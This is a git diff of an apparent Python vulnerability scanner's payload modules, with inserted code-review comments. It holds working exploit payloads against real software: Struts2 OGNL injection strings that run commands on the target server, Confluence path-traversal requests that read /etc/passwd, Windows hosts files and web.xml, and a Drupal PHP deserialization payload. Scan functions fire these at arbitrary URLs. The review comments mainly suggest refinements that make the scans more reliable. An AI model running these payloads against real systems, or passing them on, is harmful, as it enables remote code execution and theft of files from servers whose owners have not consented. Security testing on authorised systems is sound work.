'username=admin&password=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md) - }, - ] - - self.s2_005_payloads = [ - { - 'path': 'example/HelloWorld.action?(a)(%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue)&(b)(%5cu0023context[\'xwork.MethodAccessor.denyMethodExecution\']%5cu003dfalse)&(c)(%5cu0023ret%5cu003d@java.lang.Runtime@getRuntime().exec(\'echo%20{}\'))&(d)(%5cu0023dis%5cu003dnew%5cu0020java.io.BufferedReader(new%5cu0020java.io.InputStreamReader(%5cu0023ret.getInputStream())))&(e)(%5cu0023res%5cu003dnew%5cu0020char[20000])&(f)(%5cu0023dis.read(%5cu0023res))&(g)(%5cu0023writer%5cu003d@org.apache.struts2.ServletActionContext@getResponse().getWriter())&(h)(%5cu0023writer.println(new%5cu0020java.lang.String(%5cu0023res)))&(i)(%5cu0023writer.flush())&(j)(%5cu0023writer.close())'.format(self.md), - 'data': '' - }, - { - 'path': '?(a)(%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue)&(b)(%5cu0023context[\'xwork.MethodAccessor.denyMethodExecution\']%5cu003dfalse)&(c)(%5cu0023ret%5cu003d@java.lang.Runtime@getRuntime().exec(\'echo%20{}\'))&(d)(%5cu0023dis%5cu003dnew%5cu0020java.io.BufferedReader(new%5cu0020java.io.InputStreamReader(%5cu0023ret.getInputStream())))&(e)(%5cu0023res%5cu003dnew%5cu0020char[20000])&(f)(%5cu0023dis.read(%5cu0023res))&(g)(%5cu0023writer%5cu003d@org.apache.struts2.ServletActionContext@getResponse().getWriter())&(h)(%5cu0023writer.println(new%5cu0020java.lang.String(%5cu0023res)))&(i)(%5cu0023writer.flush())&(j)(%5cu0023writer.close())'.format(self.md), - 
'data': '' - } - ] - - self.s2_007_payloads = [ - { - 'path': 'user.action?name=cat&email=jerry@mouse.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27echo%20{}%27).getInputStream()))%20%2B%20%27'.format(self.md), - 'data': '' - }, - { - 'path': '?name=cat&email=jerry@mouse.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27echo%20{}%27).getInputStream()))%20%2B%20%27'.format(self.md), - 'data': '' - } - ] - - self.s2_008_payloads = [ - { - 'path': 'devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22echo%20{}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()'.format(self.md), - 'data': '' - }, - { - 'path': 
'?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22echo%20{}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()'.format(self.md), - 'data': '' - } - ] - - self.s2_009_payloads = [ - { - 'path': 'ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20{}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]'.format(self.md), - 'data': '' - }, - { - 'path': '?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20{}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]'.format(self.md), - 'data': '' - } - ] - - self.s2_012_payloads = [ - { - 'path': 
'user.action?name=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md), - 'data': '' - }, - { - 'path': '?name=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md), - 'data': '' - } - ] - - self.s2_059_payloads = [ - { - 'path': "?payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d", - 'data': "" - }, - { - 'path': "", - 'data': 
"payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d" - } - ] - - def s2_001_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-001' - vul_info['vul_method'] = 'POST' - vul_info['headers'] = {} - - headers = self.headers - headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_001_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.post( - target, - timeout=self.timeout, - headers=headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': target, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 'Payload': { - 'Url': url, - 'Path': path, - 'Data': data - } - } - return results - - def s2_005_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-005' - 
vul_info['vul_method'] = 'GET' - vul_info['headers'] = {} - - headers = self.headers - headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_005_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.get( - target, - timeout=self.timeout, - headers=headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': url + 'example/HelloWorld.action', - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 'Payload': { - 'Url': url, - 'Path': path - } - } - return results - - def s2_007_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-007' - vul_info['vul_method'] = 'GET' - vul_info['headers'] = {} - - headers = self.headers - headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_007_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.get( - target, - timeout=self.timeout, - headers=headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - 
except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': url + 'user.action', - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 'Payload': { - 'Url': url, - 'Path': path - } - } - return results - - def s2_008_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-008' - vul_info['vul_method'] = 'GET' - vul_info['headers'] = {} - - headers = self.headers - headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_008_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.get( - target, - timeout=self.timeout, - headers=headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': url + 'devmode.action', - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 'Payload': { - 'Url': url, - 'Path': path - } - } - return results - - def s2_009_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-009' - vul_info['vul_method'] = 'GET' - vul_info['headers'] = {} - - # headers = self.headers - # headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_009_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - 
target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.get( - target, - timeout=self.timeout, - headers=self.headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 'Payload': { - 'Url': url, - 'Path': path - } - } - return results - - def s2_012_scan(self, url): - vul_info = {} - vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE' - vul_info['vul_id'] = 'S2-012(CVE-2013-1965)' - vul_info['vul_method'] = 'GET' - vul_info['headers'] = {} - - # headers = self.headers - # headers.update(vul_info['headers']) # * 合并Headers - - for payload in self.s2_012_payloads: # * Payload - path = payload['path'] # * Path - data = payload['data'] # * Data - target = url + path # * Target - - vul_info['path'] = path - vul_info['data'] = data - vul_info['target'] = target - - try: - res = requests.get( - target, - timeout=self.timeout, - headers=self.headers, - data=data, - proxies=self.proxies, - verify=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - except requests.ConnectTimeout: - logger.logging(vul_info, 'Timeout') - return None - except requests.ConnectionError: - logger.logging(vul_info, 'Faild') - return None - except: - logger.logging(vul_info, 'Error') - return None - - if (self.md in check.check_res(res.text, self.md)): - results = { - 'Target': url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Method': vul_info['vul_method'], - 
'Payload': { - 'Url': url, - 'Path': path - } - } - return results - - def addscan(self, url, vuln=None): - if vuln: - return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) - - return [ - thread(target=self.s2_001_scan, url=url), - thread(target=self.s2_005_scan, url=url), - thread(target=self.s2_007_scan, url=url), - thread(target=self.s2_008_scan, url=url), - thread(target=self.s2_009_scan, url=url), - thread(target=self.s2_012_scan, url=url) - ] -struts2 = Struts2() \ No newline at end of file diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py index d232180..dd380e0 100644 --- a/payloads/AtlassianConfluence.py +++ b/payloads/AtlassianConfluence.py @@ -35,6 +35,7 @@ from lib.tool import head from thirdparty import requests from time import sleep +import re class AtlassianConfluence(): def __init__(self): @@ -90,6 +91,26 @@ def __init__(self): ] self.cve_2015_8399_payloads = [ + { + 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, { 'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd', 'data': '', @@ -151,7 +172,8 @@ def cve_2019_3396_scan(self, url): ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'RCE/FileRead' + # vul_info['vul_type'] = 'FileRead/RCE' + vul_info['vul_type'] = 'FileRead' vul_info['vul_id'] = 'CVE-2019-3396' vul_info['vul_method'] = 'POST' 
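Review bot: The second new entry in cve_2015_8399_payloads writes the Windows path in a plain string, `'...decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'`, where `\W`, `\S`, `\d`, `\e` and `\h` are invalid escape sequences that Python currently keeps verbatim with a DeprecationWarning (a SyntaxWarning from 3.12), so the payload only works by virtue of that leniency; prefix the literal with `r` so the backslashes are explicit. The same unescaped path is added or kept in the Grafana.py and phpMyadmin.py hunks of this commit. `head.merge(self.headers, {})` on every entry merges an empty dict and so only copies the shared headers; if that copy is the intent, a comment saying so would keep the next reader from "simplifying" it away. The enclosing __init__ starts and ends outside the hunk.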
@@ -189,16 +211,16 @@ def cve_2019_3396_scan(self, url): return None if ((self.md in check.check_res(res.text, self.md)) - or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) or (('' in res.text) and ('Confluence' in res.text)) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results @@ -245,15 +267,15 @@ def cve_2021_26084_scan(self, url): return None if (('369630' in res.text) - or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) - # or ('Microsoft Corp' in res.text) - # or ('Microsoft TCP/IP for Windows' in res.text) + or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results @@ -301,16 +323,16 @@ def cve_2015_8399_scan(self, url): logger.logging(vul_info, 'Error') return None - if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) or (('' in res.text) and ('Confluence' in res.text)) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results 
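Review bot: The new file-read check `re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)` in cve_2019_3396_scan is looser than it looks: `x{1}` is just `x` and is already covered by `.*`, and with `re.S` that `.*` may span the whole body, so a `root:` anywhere in a page followed much later by `:0:0:root` is reported as a passwd read. A pattern confined to one passwd line, e.g. `re.search(r'^root:[^:\n]*:\d{1,7}:\d{1,7}:root', res.text, re.M)`, removes that surface and drops the `re.I` that lets `ROOT:` match too. Since this commit copies the same literal into a dozen payload modules, compiling it once in lib/tool/check (say a `check.is_passwd(text)` helper) would let the next correction happen in one place. The enclosing function starts outside the hunk.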
@@ -364,7 +386,7 @@ def cve_2022_26134_scan(self, url): 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results elif (self.md in check.check_res(base64.b64decode(res.headers.get('X-Confluence', '')).decode(), self.md)): @@ -374,7 +396,7 @@ def cve_2022_26134_scan(self, url): 'Method': vul_info['vul_method'], 'Response-Headers': 'X-Confluence: XXX', 'Response-Decode': 'Base64', - 'Payload': res + 'Request': res } return results diff --git a/payloads/Discuz.py b/payloads/Discuz.py index 10d1e0d..2bbb8b3 100644 --- a/payloads/Discuz.py +++ b/payloads/Discuz.py @@ -107,7 +107,7 @@ def wooyun_2010_080723_scan(self, url): # todo 7: POC的名称( results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/Drupal.py b/payloads/Drupal.py index fa0d76b..b2bd7d5 100644 --- a/payloads/Drupal.py +++ b/payloads/Drupal.py 
@@ -62,11 +62,11 @@ def __init__(self): self.cve_2017_6920_payloads = [ { 'path': 'admin/config/development/configuration/single/import', - 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import' + 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={}&form_id=config_single_import_form&op=Import' }, { 'path': 'config/development/configuration/single/import', - 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import' + 'data': 
'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token={}&form_id=config_single_import_form&op=Import' } ] @@ -85,6 +85,25 @@ def __init__(self): }, ] + def get_form_token(self, target, vul_info): + ''' 获取drupal的form_token ''' + res = requests.get( + target, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + + form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S) + if (form_token): + self.form_token = form_token.group().replace('name="form_token" value="', '') + return self.form_token + else: + return None + def cve_2018_7600_scan(self, url): ''' ''' vul_info = {} @@ -132,7 +151,7 @@ def cve_2018_7600_scan(self, url): 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results @@ -185,7 +204,7 @@ def cve_2014_3704_scan(self, url): 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results @@ -193,7 +212,7 @@ def cve_2017_6920_scan(self, url): ''' ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'unSerialize' + vul_info['vul_type'] = 'unSerialize/RCE' vul_info['vul_id'] = 'CVE-2017-6920' vul_info['vul_method'] = 'POST' vul_info['headers'] = {} 
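Review bot: The new `form_token={}` placeholder makes the token dynamic, but `form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs` in the same body stays hard-coded; Drupal ties form_build_id to server-side cached form state, so whether a fixed value passes validation on this form should be confirmed on a test instance rather than assumed, and the page fetch that now supplies the token could capture `form_build_id` at the same time (cve_2018_7602_scan already keeps a `self.form_build_id`, visible in a later hunk). `.format()` is only safe on this body because every brace in it is percent-encoded as `%7B`/`%7D`; a one-line comment to that effect would protect whoever next edits the payload. The enclosing __init__ starts and ends outside the hunk.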
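Review bot: get_form_token both returns the token and stores it in `self.form_token`, and cve_2018_7602_scan (hunk further down) goes on to read the attribute rather than the return value; if addscan runs the Drupal scans as concurrent threads on this single instance, as the other payload modules in this commit do, a cve_2017_6920_scan call can overwrite `self.form_token` between the fetch and its use. Keeping the token in a local in each caller, with `self.form_token` at most as a cache, makes that race impossible. The regex `name="form_token" value=".{43}` assumes a fixed 43-character token and, under `re.S`, lets the match run across a newline; `re.search(r'name="form_token" value="([^"]+)"', res.text)` with `.group(1)` is safer and drops the `.replace()` trick. The request here has no exception handling of its own, so a timeout propagates to the caller's try/except — true for both callers in this commit, but worth a docstring line so a third caller does not forget.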
@@ -211,6 +230,12 @@ def cve_2017_6920_scan(self, url): vul_info['target'] = target try: + form_token = self.get_form_token(target, vul_info) + if (form_token): + data = data.format(form_token) + else: + return None + res = requests.post( target, timeout=self.timeout, @@ -236,7 +261,7 @@ def cve_2017_6920_scan(self, url): 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 'Method': vul_info['vul_method'], - 'Payload': res + 'Request': res } return results @@ -263,19 +288,9 @@ def cve_2018_7602_scan(self, url): try: if payload == 0: # * 当payload为第1个时, 获取form_token - res = requests.get( - target, - timeout=self.timeout, - headers=self.headers, - proxies=self.proxies, - verify=False, - allow_redirects=False - ) - logger.logging(vul_info, res.status_code, res) # * LOG - - form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S) + form_token = self.get_form_token(target, vul_info) if (form_token): - self.form_token = form_token.group().replace('name="form_token" value="', '') + continue else: return None @@ -338,14 +353,12 @@ def cve_2018_7602_scan(self, url): 'Url': url, 'Path': self.cve_2018_7602_payloads[1]['path'], 'Data': self.cve_2018_7602_payloads[1]['data'].format(self.form_token), - 'form_token': self.form_token }, 'Payload-3': { 'Method': 'POST', 'Url': url, 'Path': path, 'Data': data, - 'form_build_id': self.form_build_id } } return results diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py index fe6ff92..aa4bf46 100644 --- a/payloads/ElasticSearch.py +++ b/payloads/ElasticSearch.py @@ -34,6 +34,7 @@ from lib.tool import head from thirdparty import requests from time import sleep +import re class ElasticSearch(): def __init__(self): @@ -159,7 +160,7 @@ def cve_2014_3120_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results 
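Review bot: In cve_2017_6920_scan the token is substituted into the loop-local `data` after `vul_info['data']` has, going by the pattern in the sibling scans, already been set from the template, so the line written by logger.logging carries the literal `{}` instead of the body actually sent; moving `vul_info['data'] = data` below `data = data.format(form_token)` fixes that. Returning None when the first path yields no token also silently skips the second payload (`config/development/configuration/single/import`), because `return None` is used where `continue` would try the next entry. The enclosing function starts outside the hunk.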
